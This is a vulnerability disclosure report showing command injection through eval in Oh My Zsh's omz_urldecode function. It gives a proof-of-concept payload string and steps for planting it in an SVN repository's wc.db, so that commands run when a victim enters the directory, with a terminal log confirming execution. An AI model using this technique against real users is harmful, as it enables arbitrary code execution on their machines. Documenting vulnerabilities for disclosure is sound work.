Description

In Oh My Zsh, there is a function called omz_urldecode, which is used to decode URLs. Since this function is using eval with user inputs without any sanitization, it’s possible to inject arbitrary commands into the eval context, which allows an attacker to achieve the command injection.

Some official themes are using this function via svn_prompt_info, so it’s possible to execute arbitrary commands once someone changed their current directory to the malicious SVN repository.

Steps to reproduce

Simpler steps:

1​. Open Oh My Zsh in your terminal.

2​. Execute omz_urldecode "test'+id+&&+echo+'pwned'+&&+touch+'/tmp/pwned".

3​. id && echo 'pwned' && touch /tmp/pwned will be executed.

Realistic attack scenario:

Setup a malicious SVN repository:

1​. Install subversion and sqlite3.

2​. Create a new repository in /tmp/svn: svnadmin create /tmp/svn

3​. Create a new directory named repo in /tmp and change the current directory: mkdir /tmp/repo && cd /tmp/repo

4​. Checkout the repository: svn co file:///tmp/svn /tmp/repo

5​. Open .svn/wc.db with sqlite3: sqlite3 .svn/wc.db

6​. Update the repository URL: update NODES set repos_path="test'+id+&&+echo+'pwned'+&&+touch+'/tmp/pwned" where local_relpath="";

7​. Quit sqlite3: .exit

​

Trigger the vulnerability:

1​. Open ~/.zshrc with a text editor.

2​. Set ZSH_THEME to minimal: ZSH_THEME="minimal"

3​. Add svn to plugins: plugins=(git svn)

4​. Restart Oh My Zsh, and apply the configuration.

5​. Change the current directory to /tmp/repo: cd /tmp/repo

6​. id && echo 'pwned' && touch /tmp/pwned will be executed.

​

➜  / ls -la /tmp/pwned
ls: cannot access '/tmp/pwned': No such file or directory
➜  / svnadmin create /tmp/svn
➜  / mkdir /tmp/repo && cd /tmp/repo
➜  repo svn co file:///tmp/svn /tmp/repo
Checked out revision 0.
➜  repo sqlite3 .svn/wc.db
SQLite version 3.31.1 2020-01-27 19:55:54
Enter ".help" for usage hints.
sqlite> update NODES set repos_path="test'+id+&&+echo+'pwned'+&&+touch+'/tmp/pwned" where local_relpath="";
sqlite> .exit
➜  repo cd /
➜  / vim ~/.zshrc
➜  / zsh
/ » cd /tmp/repo
/tmp/repo [uid=0(root) gid=0(root) groups=0(root)
pwned] » ls -la /tmp/pwned
-rw-r--r-- 1 root root 0 Nov  2 04:21 /tmp/pwned
/tmp/repo [uid=0(root) gid=0(root) groups=0(root)
pwned] »

Impact

As omz_urldecode function itself is intended to be used in the plugins/functions, it may allow an attacker to achieve remote code execution, depends on how themes/plugins use this function.